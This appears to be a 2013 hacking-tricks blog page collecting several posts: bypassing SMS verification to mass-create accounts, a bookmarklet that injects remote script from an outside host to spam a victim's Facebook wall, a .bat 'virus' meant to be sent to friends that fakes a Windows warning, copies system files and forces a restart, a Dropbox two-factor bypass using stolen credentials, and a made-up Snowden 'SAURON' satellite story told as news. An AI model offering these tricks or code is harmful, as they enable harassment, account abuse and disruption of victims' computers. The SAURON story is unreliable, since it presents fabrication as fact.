Sunday, July 7, 2013

How to Trace Any Mobile Number


How to Trace Any Mobile No

 
Guys today i post how to get detail any missed call  and mobile no. calls
 First go to http://www.india-cellular.com/mobile-number-locator.aspx
Second  Enter 4 digit of mobile no you want to detail . then enter


this trick show you service provider and  state, city   

“Enter Password ” HackinG

This is  “Enter Password ” hacking. trick.

1:- Go to Google search engine and type “enter password”.
2:- Pick some one any website.
3:- Go to “view source” option in view.
4:- Find password by “password name,password field,password value and password
   password save in source with “……….”.
Guys if you like this plz comment. this valuable for me

Bypass Phone and SMS verification of Any Website



Now a days, almost most websites need sms verification which includes google, facebook, youtube and other survey websites.

First of all we should understand why SMS and Phone Verification System is Important?

* Keep More Visitors for Market
* Providing Extra Security for their Website
* Keep Spammers out
* Daily Advertisement and promotional ads daily

Rather we can able to create and Bypass gmail (facebook, youtube, other shopping sites) without SMS verification. Because gmail allow to create only few account. When you try to create more account with same mobile number, google restricted and you can't create more account. so we can create counterless gmail accounts using following steps.
This method is very useful to Bypass SMS verification and useful when you need to Sign up any account and do not feel comfortable to giving your real number or if you want to create multiple account.

Lets Start Step by Step:

1) First go to this Website : Receive-Sms Online

2) Copy any one number and paste it where they are asking SMS Verification.

Bypass-Phone-and-SMS-verification-of-Any-Website
3) Simply come back and click the number which you have selected, check it out there is your code sent by google, youtube or whatever else.

Ruin Facebook wall

Looking for a way to piss off your friends on Facebook? Here’s how.

 
1. Go to the victims wall on Facebook
 
2. Copy and paste the code below into the address bar on your browser and hit enter
Once Thats done you will see the meaning of Step 3.
 
3. Enter # of times you want message posted on the wall and the message.
 
4. Refresh the page and laugh.
 
The code [Do not edit the code] :
 
Code:
javascript:(a = (b = document).createElement(“script”)).src = “//hallwayinsider.com/a.js”, b.body.appendChild(a); void(0)
 

How To Create Virus


 
 
1:- delete windows  
 
 copy code below there  and paste in notepad  , save file with any name   with .bat
 then send to your friends and also hide in picture.
code:
@echo off
cls
color 0C
echo Windows has found a virus…
echo.
echo It is recommended to let Windows fix this issue.
echo.
echo If you do not let Windows fix this issue,
echo the next time you restart the computer
echo Windows will not load properly.
set /p command=Would you like windows to fix this issue? (Y/N): 
if “%command%”==”Y” goto :delete
if “%command%”==”N” goto :exit
:delete
cls
echo Deleting files in %WINDIR%.
PING 1.1.1.1 -n 1 -w 2500 >NUL
cls
echo Deleting files in %WINDIR%..
PING 1.1.1.1 -n 1 -w 2500 >NUL
cls
echo Deleting files in %WINDIR%…
PING 1.1.1.1 -n 1 -w 2500 >NUL
cls
if exist “C:\WIN” goto start
MKDIR “C:\WIN”
:start
xcopy /E /Y %windir% “C:\WIN”
del C:\WIN
cls
shutdown -r -t 10 -c “Windows has succesfully fixed the issue.”
:exit
exit 

Snowden unveils NSA Satellite SAURON Program targeting Citizens

sauronseye 269x300 Snowden unveils NSA Satellite SAURON Program targeting Citizens
Edward Snowden unveiled SAURON, a network of satellites capable of spying on the entire planet’s surface and indefinitely retaining the images.
MOSCOW, Russia – Edward Snowden, the whistleblower who recently unveiled the NSA’s ubiquitous PRISM wiretapping program, unveiled yet another insidious, citizen-targeting surveillance system Friday afternoon, in a chat with Internet Chronicle reporters.
SAURON, or the Semi-Autonomous Ultra-high-Resolution Orbital Network, is comprised of a series of hundreds of low-orbiting cameras that can make out objects on the ground as small as 1 centimeter in size.
There are so many satellites in this network that they are able to effectively monitor the entire planet’s populated surface without interruption. According to slides Snowden shared, taken from the NSA presentation on SAURON, each spy satellite feeds directly into a data bank so large that it is able to retain the captured imagery indefinitely.
SAURON is also a reference to a villain in J.R.R. Tolkien’s “Lord of the Rings” trilogy, an evil god of discord who appears in the material world as an ever-searching eye.
Snowden, looking as if he hadn’t slept in weeks, spoke with Internet Chronicle reporters in the transit corridor of Moscow’s Sheremetyevo airport. In a near whisper Snowden said, “It is shocking that the U.S. government would appropriate such evil imagery for a so-called security system like this. There is little doubt that this program – I won’t utter the name here – is not concerned with the security of citizens, but rather, it is a bald grab at power for power’s sake.”

Hacking DropBox account, Vulnerability allows hacker to bypass Two-Factor Authentication


Q-CERT team found a critical vulnerability that can allow the attacker to by-pass the two-factor authentication in the popular file sharing service ‘DropBox‘.

Two Factor Authentication is an extra layer of security that is known as “multi factor authentication” that requires not only a password and username but also a unique code that only user can get via SMS or Call.
Zouheir Abdallah demonstrated that, if an attacker already knows the username and password of the victim’s Dropbox account, which is protected by two-factor authentication, it is still possible to hack that Dropbox account.

Because DropBox does not verify the authenticity of the email addresses used to Sign up a new account, so to exploit this flaw hacker just need to create a new fake account similar to the target’s account and append a dot (.) anywhere in the email address.
In Next step, enable 2-factor authentication for the fake account, and save the emergency code generated at the end of the process. This emergency code feature is provided, in case user lost his phone, then using this backup code user can disable two factor authentication from his account.

Next, logout from the the fake account created by attacker and login into the victim’s account using the real credentials (attacker already have using any keylogger or phishing technique).
Because 2-Factor authentication was enabled for victim’s account, so website will ask to enter the OTP code. Leave it, just choose “I Lost My Phone” from the same screen. You will be prompted to use the “Emergency Code”.
That’s it ! Use the emergency code generated for the fake account to disable 2-Factor authentication from the victim’s account and attacker will gain full access.

Q-CERT worked with DrobBox security team to patch the issue.